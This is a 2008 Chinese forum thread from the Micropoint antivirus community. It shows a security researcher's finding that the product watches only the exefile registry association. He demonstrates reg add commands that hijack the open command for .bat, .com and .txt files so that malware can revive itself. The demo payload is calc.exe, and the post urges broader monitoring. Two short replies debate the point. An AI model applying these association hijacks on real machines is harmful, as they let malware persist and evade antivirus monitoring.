标题: 【shineast】在微点的监控下复活病毒木马，小发现而已 [打印本页]

---

作者: 点饭的百度空间     时间: 2008-5-25 16:52    标题: 【shineast】在微点的监控下复活病毒木马，小发现而已


shineast’s Blog
http://hi.baidu.com/shineastdh/b ... 3005dc8c10297d.html

资　料:
看雪软件安全论坛 shineast
男, 24岁
帖子: 26
精华: 2
声望: 11   
就读过的学校： 西安交大
个人简介： 将漏洞挖掘进行到底!
我的理想就是做中国最好的杀毒软件，现在正在学习微点，虽然微点在技术上还有很多问题，但是思想上已经是创新了。

另外微点实现这个思想的时候方法、细节还是有点问题，绕过就是很头疼的问题。

没办法，搞事业就要不断的遇到问题，能做好技术，解决好问题才是王道！

2008年05月25日 星期日 下午 04:34

reg add HKEY_CLASSES_ROOT\batfile\shell\open\command /v "" /t REG_SZ /d "C:\WINDOWS\system32\calc.exe" /f

reg add HKEY_CLASSES_ROOT\comfile\shell\open\command /v "" /t REG_SZ /d "C:\WINDOWS\system32\calc.exe" /f

reg add HKEY_CLASSES_ROOT\txtfile\shell\open\command /v "" /t REG_SZ /d "C:\WINDOWS\system32\calc.exe" /f

.......

多整几个xxxfile，这样复活、唤醒的概率就比较高

经过我的测试，貌似微点的RD就监控了一个 exefile，这是为什么呢？

为啥不监控其他xxxfile呢，看来微点很自信！

不过我觉得不安全，应该监控所有的xxxfile，反正监控1个和监控10没啥区别

【shineast】终于领悟了主动防御
http://bbs.micropoint.com.cn/showthread.asp?tid=33493&fpage=2

【shineast】僵尸还魂——自启动+kill微点(已解决)
http://hi.baidu.com/micropoint/b ... 833046fbf2c093.html

【shineast】东方微点注册表保护绕过及反绕过实现(已解决)
http://bbs.micropoint.com.cn/showthread.asp?tid=33345&fpage=1

[ Last edited by 点饭的百度空间 on 2008-5-25 at 17:06 ]

---

作者: ma2235153     时间: 2008-5-25 19:47
监视一个应该有他的道理吧！10会不会占资源啊

---

作者: gudan     时间: 2008-5-25 19:55
感觉这个意义不大，木马主要以网络为主的，行为构成以后再回滚也不迟，倘若把这里看的死死的，装个UE能烦死人

---

欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn